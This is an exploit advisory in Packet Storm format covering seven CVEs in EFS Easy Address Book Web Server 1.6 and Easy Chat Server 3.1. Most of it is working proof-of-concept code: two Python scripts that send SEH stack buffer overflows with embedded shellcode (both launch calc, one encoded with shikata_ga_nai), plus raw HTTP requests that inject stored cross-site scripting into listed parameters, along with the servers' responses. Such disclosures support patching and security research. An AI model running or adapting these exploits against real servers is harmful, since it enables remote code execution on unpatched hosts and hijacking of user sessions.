Share
## https://sploitus.com/exploit?id=PACKETSTORM:174432
# Exploit Title: Easy Address Book Web Server v1.6 - Multiple  
Vulnerabilities  
# Discovery by: Rafael Pedrero  
# Discovery Date: 2021-01-10  
# CVE: CVE-2023-4491, CVE-2023-4492, CVE-2023-4493  
# Vendor Homepage: http://www.efssoft.com/web-address-book-server.html  
# Software Link : http://www.efssoft.com/eabws.exe (md5sum:  
69f77623bb32589fb5343f598b61bbd9)  
# Tested Version: 1.6  
# Tested on: Windows 7, 10  
  
# CVE-2023-4491: Vulnerability Type: searchbook Remote Buffer Overflow  
  
CVSS v3: 9.8  
CVSS vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H  
CWE: CWE-119  
  
  
Vulnerability description: There is a remote stack-based buffer overflow  
(SEH) in /searchbook.ghp in EFS Software Easy Address Book Web Server 1.6.  
By sending an overly long username string to /searchbook.ghp for asking the  
name via POST, an attacker may be able to execute arbitrary code.  
  
Proof of concept:  
  
import socket  
import struct  
  
def sendbuff():  
# > arwin.exe kernel32.dll WinExec  
# WinExec is located at 0x776f2c91 in kernel32.dll  
shellcode_WinExec = (  
"\x33\xc0" # XOR EAX,EAX  
"\x50" # PUSH EAX => padding for lpCmdLine  
"\x68\x2E\x65\x78\x65" # PUSH ".exe"  
"\x68\x63\x61\x6C\x63" # PUSH "calc"  
"\x8B\xC4" # MOV EAX,ESP  
"\x6A\x01" # PUSH 1  
"\x50" # PUSH EAX  
"\xBB\x91\x2c\x6f\x77" # MOV EBX,kernel32.WinExec  
"\xFF\xD3") # CALL EBX  
  
shellcode_system = (  
"\x31\xC9" # xor ecx,ecx  
"\x51" # push ecx  
"\x68\x63\x61\x6C\x63" # push 0x636c6163  
"\x54" # push dword ptr esp  
"\xB8\x6f\xb1\xdc\x75" # mov eax,msvcrt.system  
"\xFF\xD0") # call eax  
  
shellcode = shellcode_WinExec  
# SEH  
junk1 = "A"*455  
buffer = junk1  
buffer += "\xeb\x10\x90\x90" # jmp 0x10 to nops to shellcode  
buffer += struct.pack('<L',0x1001071e) # pop/pop/ret @ 0x1001071e  
SSLEAY32.DLL from !Mona 0x1001071e  
buffer += "\x90" * 20  
buffer += shellcode  
junk2 = "D"*(840 - 455 - len(shellcode) - 4 - 4 - 20)  
buffer += junk2  
return buffer  
  
  
def REQ_POST (padding):  
POST = (  
"POST http://"+str(ip)+"/searchbook.ghp?id=1 HTTP/1.1\r\n"  
"User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0)  
Gecko/20100101 Firefox/70.0\r\n"  
"Accept:  
text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"  
"Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3\r\n"  
"Content-Type: application/x-www-form-urlencoded\r\n"  
"Content-Length: " + str(108 + len(padding))+ "\r\n"  
"Connection: keep-alive\r\n"  
"Referer: http://"+str(ip)+"/searchcontact.ghp?id=1\r\n"  
"Cookie: SESSIONID=3938; UserID=; PassWD=\r\n"  
"Upgrade-Insecure-Requests: 1\r\n"  
"Host: "+str(ip)+"\r\n\r\n"  
"addrbookid=1&contactid=%3C%21--cid--%3E&cancelflag=0&name=" + padding  
+  
"&cancelflag=0&name=AAA&Email=&address=&phone=&other=&search=Start+Search\r\n\r\n"  
)  
return POST  
  
ip = '192.168.X.X'  
port = 80  
payload = sendbuff()  
  
try:  
print "\n[*] Sending POST (searchbook.ghp) exploit to Easy Address Book  
Web Server V1.6, length " + str(len(payload))  
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  
s.connect((ip, port))  
s.send(REQ_POST(payload))  
s.recv(1024)  
s.close()  
print "\n[*] Sended POST length " + str(len(payload))  
except:  
print "Connecting error"  
  
  
  
# CVE-2023-4492: Vulnerability Type: stored Cross-Site Scripting (XSS) - #1  
  
CVSS v3: 6.5  
CVSS vector: 3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N  
CWE: CWE-79  
  
Vulnerability description: Easy Address Book Web Server v1.6, does not  
sufficiently encode user-controlled inputs, resulting in a stored  
Cross-Site Scripting (XSS) vulnerability via the /addrbook.ghp (POST  
method), in multiple parameters.  
  
Proof of concept:  
  
POST http://localhost/addrbook.ghp?id=1 HTTP/1.1  
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0)  
Gecko/20100101 Firefox/70.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 475  
Origin: http://localhost  
Connection: keep-alive  
Referer: http://localhost/editcontact.ghp?id=1&cid=12  
Cookie: SESSIONID=15337; UserID=; PassWD=  
Upgrade-Insecure-Requests: 1  
Host: localhost  
  
addrbookid=1&contactid=14&cancelflag=0&firstname=%3C%2Fa%3E%3Cscript%3Ealert%2811%29%3B%3C%2Fscript%3E%3Ca%3E&middlename=demo1&lastname=demo1&nickname=demo1&Email=demo1%  
40demo1.com  
&company=demo1&jobtitle=demo1&department=demo1&office=demo1&workphone=&workfax=&workaddress=demo1&workcity=&workstate=&workzip=&workcountry=USA&homephone=&homefax=&homeaddress=demo1&homecity=&homestate=&homezip=&homecountry=USA&mobilephone=&pager=&email2=&email3=&homepage=&notes=demo1&save=Save  
  
Vulnerable parameters: firstname, homephone, lastname, middlename,  
workaddress, workcity, workcountry, workphone, workstate, workzip  
  
Response:  
  
<TR>  
<TD class=row2><SPAN class=genmed><A target=_blank  
class=genmed href="viewcontact.ghp?id=1&cid=12">demo1  
</a><script>alert(1);</script><a> demo1</A></SPAN></TD>  
<TD class=row2 align=left><SPAN class=genmed><a href="mailto:  
demo1@demo1.com">demo1@demo1.com</a></SPAN></TD>  
<TD class=row2 align=left><SPAN class=genmed></SPAN></TD>  
<TD class=row2 align=left><SPAN class=genmed></SPAN></TD>  
<TD class=row2 align=left><SPAN class=genmed>demo1, , , ,  
USA</SPAN></TD>  
<TD class=row2 align=left><SPAN class=genmed><a  
href="editcontact.ghp?id=1&cid=12">Edit</a></SPAN></TD>  
<TD class=row2 align=left><SPAN class=genmed><a  
href="javascript:deletecontact('deletecontact.ghp?id=1&cid=12','demo1  
</a><script>alert(1);</script><a> demo1')">Delete</a></SPAN></TD>  
  
  
  
# CVE-2023-4493: Vulnerability Type: stored Cross-Site Scripting (XSS) - #2  
  
  
CVSS v3: 6.5  
CVSS vector: 3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N  
CWE: CWE-79  
  
Vulnerability description: Easy Address Book Web Server v1.6, does not  
sufficiently encode user-controlled inputs, resulting in a stored  
Cross-Site Scripting (XSS) vulnerability via the /users_admin.ghp (POST  
method, authenticated Admin user), in multiple parameters.  
  
Proof of concept:  
  
Example 1:  
  
POST http://localhost/users_admin.ghp HTTP/1.1  
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0)  
Gecko/20100101 Firefox/70.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 134  
Origin: http://localhost  
Connection: keep-alive  
Referer: http://localhost/users_admin.ghp  
Cookie: SESSIONID=19655; UserID=Admin; PassWD=<redacted>  
Upgrade-Insecure-Requests: 1  
Host: localhost  
  
userid=2&username=test&password=test&email=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&level=user&state=Enable&update_user=Update  
  
Vulnerable parameter: email  
  
Response:  
  
<form method="POST" action="">  
<TR>  
<input type="hidden" name="userid" value="2">  
<TD class=row2 align=left><input type="text" name="username" size="15"  
value="test"> </TD>  
<TD class=row2 align=left><input type="text" name="password" size="15"  
value=""> </TD>  
<TD class=row2 align=left><input type="text" name="email" size="35"  
value=""><script>alert(1);</script>"> </TD>  
<TD class=row2 align=left><select name="level"><option  
>guest</option><option selected>user</option><option >power  
user</option></select></TD>  
<TD class=row2 align=left><select name="state"><option  
selected>Enable</option><option >Disable</option></select></TD>  
<TD class=row2 align=left><input type="submit" value="Update"  
name="update_user"></TD>  
<TD class=row2><SPAN class=genmed><A class=genmed  
href="user_delete_admin.ghp?2">Delete</A></SPAN></TD>  
</TR>  
</form>  
  
Example 2:  
  
POST http://localhost/users_admin.ghp HTTP/1.1  
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0)  
Gecko/20100101 Firefox/70.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 144  
Origin: http://localhost  
Connection: keep-alive  
Referer: http://localhost/users_admin.ghp  
Cookie: SESSIONID=19655; UserID=Admin; PassWD=<redacted>  
Upgrade-Insecure-Requests: 1  
Host: localhost  
  
userid=2&username=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&password=test&email=tt%  
40fsdfs.com&level=user&state=Enable&update_user=Update  
  
Vulnerable parameter: username  
  
Response:  
  
<form method="POST" action="">  
<TR>  
<input type="hidden" name="userid" value="2">  
<TD class=row2 align=left><input type="text" name="username" size="15"  
value=""><script>alert(1);</script>"> </TD>  
<TD class=row2 align=left><input type="text" name="password" size="15"  
value=""> </TD>  
<TD class=row2 align=left><input type="text" name="email" size="35" value="  
tt@fsdfs.com"> </TD>  
<TD class=row2 align=left><select name="level"><option  
>guest</option><option selected>user</option><option >power  
user</option></select></TD>  
<TD class=row2 align=left><select name="state"><option  
selected>Enable</option><option >Disable</option></select></TD>  
<TD class=row2 align=left><input type="submit" value="Update"  
name="update_user"></TD>  
<TD class=row2><SPAN class=genmed><A class=genmed  
href="user_delete_admin.ghp?2">Delete</A></SPAN></TD>  
</TR>  
</form>  
  
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------  
  
# Exploit Title: Easy Chat Server v3.1 - Multiple Vulnerabilities  
# Discovery by: Rafael Pedrero  
# Discovery Date: 2021-01-09  
# CVE: CVE-2023-4494, CVE-2023-4495, CVE-2023-4496, CVE-2023-4497  
# Vendor Homepage: http://www.echatserver.com/  
# Software Link : http://echatserver.com/ecssetup.exe (md5sum:  
c682138ebbea9af7948a3f142bbd054b)  
# Tested Version: 3.1  
# Tested on: Windows 7, 10  
  
# CVE-2023-4494: Vulnerability Type: register Remote Buffer Overflow  
  
CVSS v3: 9.8  
CVSS vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H  
CWE: CWE-119  
  
  
Vulnerability description: There is a remote stack-based buffer overflow  
(SEH) in register.ghp in EFS Software Easy Chat Server versions 2.0 to 3.1.  
By sending an overly long username string to register.ghp for asking the  
username via GET, an attacker may be able to execute arbitrary code.  
  
Proof of concept:  
  
import socket  
  
def sendbuff():  
# calc shellcode from https://code.google.com/p/win-exec-calc-shellcode/  
# msfencode -b "\x00\x20" -i w32-exec-calc-shellcode.bin  
# [*] x86/shikata_ga_nai succeeded with size 101 (iteration=1)  
shellcode = (  
"\xd9\xcb\xbe\xb9\x23\x67\x31\xd9\x74\x24\xf4\x5a\x29\xc9" +  
"\xb1\x13\x31\x72\x19\x83\xc2\x04\x03\x72\x15\x5b\xd6\x56" +  
"\xe3\xc9\x71\xfa\x62\x81\xe2\x75\x82\x0b\xb3\xe1\xc0\xd9" +  
"\x0b\x61\xa0\x11\xe7\x03\x41\x84\x7c\xdb\xd2\xa8\x9a\x97" +  
"\xba\x68\x10\xfb\x5b\xe8\xad\x70\x7b\x28\xb3\x86\x08\x64" +  
"\xac\x52\x0e\x8d\xdd\x2d\x3c\x3c\xa0\xfc\xbc\x82\x23\xa8" +  
"\xd7\x94\x6e\x23\xd9\xe3\x05\xd4\x05\xf2\x1b\xe9\x09\x5a" +  
"\x1c\x39\xbd"  
)  
  
# SEH  
junk1 = "A"*473  
buffer = junk1  
buffer += "\xeb\x06\x90\x90" # short jmp to shellcode  
buffer += "\x1e\x0e\x01\x10" # pop/pop/ret @ 0x10010E1E  
SSLEAY32.DLL from !Mona  
buffer += shellcode  
junk2 = "D"*(600 - 473 - len(shellcode) - 4 - 4)  
buffer += junk2  
  
return buffer  
  
  
def REQ_GET (padding):  
GET = (  
"GET /register.ghp?username=" + padding + "&password= HTTP/1.1\r\n"  
"User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML,  
like Gecko) Chrome/86.0.4240.75 Safari/537.36\r\n"  
"Host: "+str(ip)+":80\r\n"  
"Accept-Language: es-es\r\n"  
"Accept-Encoding: gzip, deflate\r\n"  
"Referer: http://"+str(ip)+"\r\n"  
"Connection: Keep-Alive\r\n\r\n"  
)  
return GET  
  
ip = '192.168.X.X' # change the ip address  
port = 80  
payload = sendbuff()  
  
try:  
print "\n[*] Sending GET (register.ghp) exploit to EFS Easy Chat Server  
3.1, length " + str(len(payload))  
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  
s.connect((ip, port))  
s.send(REQ_GET(payload))  
s.recv(1024)  
s.close()  
print "\n[*] Sended GET length " + str(len(payload))  
except:  
print "Connection error"  
  
  
  
# CVE-2023-4495: Vulnerability Type: stored Cross-Site Scripting (XSS) - #1  
  
CVSS v3: 6.5  
CVSS vector: 3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N  
CWE: CWE-79  
  
Vulnerability description: Easy Chat Server v3.1, does not sufficiently  
encode user-controlled inputs, resulting in a stored Cross-Site Scripting  
(XSS) vulnerability via the /registresult.htm (POST method), in Resume  
parameter. The XSS is loaded from /register.ghp.  
  
Proof of concept:  
  
POST http://localhost/registresult.htm HTTP/1.1  
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0)  
Gecko/20100101 Firefox/70.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 257  
Origin: http://localhost  
Connection: keep-alive  
Referer: http://localhost/register.ghp?username=  
<redacted>&password=<redacted>  
Upgrade-Insecure-Requests: 1  
Host: localhost  
  
UserName=<redacted>&Password=<redacted>&Password1=demo1&Sex=0&Email=demo1%  
25252540demo1.com  
&Icon=0.gif&Resume=%3C%2FTEXTAREA%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E%3CTEXTAREA%3E&cw=0&RoomID=%3C%21--%24RoomID--%3E&RepUserName=%3C%21--%24UserName--%3E&submit1=Change  
  
Response  
<BODY bgcolor="#b8d0dc"><center>Congratulations! Your information has been  
changed successfully.</center></body>  
  
  
Go to:  
http://localhost/register.ghp?username=<redacted>&password=<redacted>  
  
Response - xss:  
<TR><TD>  
Your profile/interests:<BR>  
<TEXTAREA rows="4" cols="30"  
name="Resume"></TEXTAREA><script>alert(1)</script><TEXTAREA></TEXTAREA>  
<INPUT type="hidden" name="cw" value="0">  
<INPUT type="hidden" name="RoomID" value="<!--$RoomID-->">  
<INPUT type="hidden" name="RepUserName" value="<!--$UserName-->">  
</TD></TR>  
  
# CVE-2023-4496: Vulnerability Type: stored Cross-Site Scripting (XSS) - #2  
  
  
CVSS v3: 6.5  
CVSS vector: 3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N  
CWE: CWE-79  
  
Vulnerability description: Easy Chat Server v3.1, does not sufficiently  
encode user-controlled inputs, resulting in a stored Cross-Site Scripting  
(XSS) vulnerability via the /body2.ghp (POST method), in mtowho parameter.  
  
  
Proof of concept:  
  
POST http://localhost/body2.ghp?username=<redacted>&password=<redacted>&room=4  
HTTP/1.1  
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0)  
Gecko/20100101 Firefox/70.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 248  
Origin: http://localhost  
Connection: keep-alive  
Referer: http://localhost/chatsubmit.ghp?username=  
<redacted>&password=<redacted>&room=4  
Upgrade-Insecure-Requests: 1  
Host: localhost  
  
staticname=%3A000539&tnewname=&msayinfo=demo+&mnewname=&mtowho=%3C%2Fscript%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E%3Cscript%3E&mfilters=0&mfont=0&mfcolor=1&elist=100&seltype=Theme&msg=&Submit=Send&sc=on&notifysound=on&message=demo+&chat_flag=  
  
  
Response:  
<html>  
<head>  
</head>  
<body>  
<script language="JavaScript">  
<!--  
parent.board.document.body.innerHTML=parent.board.document.body.innerHTML+"<br><font  
color=green size=2>08:22:16 <a target=chatsubmit  
href=javascript:parent.chatsubmit.getname('<redacted>');><redacted></a> =>  
<a target=chatsubmit  
href=javascript:parent.chatsubmit.getname('</script><script>alert(1);</script><script>');></script><script>alert(1);</script><script></a>  
</font><font color=#000000 size=2>demo </font> <img src=/face/100.gif  
border=0>";  
// -->  
</script>  
</body>  
</html>  
  
  
# CVE-2023-4497: Vulnerability Type: stored Cross-Site Scripting (XSS) - #3  
  
CVSS v3: 6.5  
CVSS vector: 3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N  
CWE: CWE-79  
  
Vulnerability description: Easy Chat Server v3.1, does not sufficiently  
encode user-controlled inputs, resulting in a stored Cross-Site Scripting  
(XSS) vulnerability via the /registresult.htm (POST method), in Icon  
parameter. The XSS is loaded from /users.ghp.  
  
Proof of concept:  
  
POST /registresult.htm HTTP/1.1  
Host: localhost  
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0)  
Gecko/20100101 Firefox/70.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3  
Accept-Encoding: gzip, deflate  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 235  
Origin: http://localhost  
Connection: close  
Referer: http://localhost/register.ghp?username=  
<redacted>&password=<redacted>  
Upgrade-Insecure-Requests: 1  
  
UserName=<redacted>&Password=<redacted>&Password1=<redacted>&Sex=0&Email=<redacted>%252525252540<redacted>.com&Icon="><script>alert(111)</script><img%20src="1.gif&Resume=AAA&cw=0&RoomID=%3C%21--%24RoomID--%3E&RepUserName=%3C%21--%24UserName--%3E&submit1=Change  
  
Response:  
<BODY bgcolor="#b8d0dc"><center>Congratulations! Your information has been  
changed successfully.</center></body>  
  
When user information page load:  
  
http://localhost/users.ghp?username=<redacted>&password=<redacted>&room=4  
  
&nbsp;<font color="red">[vip room]</font>  
<br><br>  
[Online users:1]<br><br>[<a  
href="javascript:parent.chatsubmit.getname('All');"  
target="chatsubmit">All</a>]  
<br><br>  
<script>  
if(navigator.appName!="Netscape" && parent.chatsubmit.document &&  
parent.chatsubmit.document.readyState == "complete")  
parent.chatsubmit.listcolorchange();  
</script>  
<img src="/images/""><script>alert(111)</script><i>[<a  
href="javascript:parent.chatsubmit.getname('<redacted>');"  
target="chatsubmit"><redacted></a>]<==<br>  
<br>  
<br><br>  
[<a href="javascript:OnRegister();">Change infomation</a>]  
</i>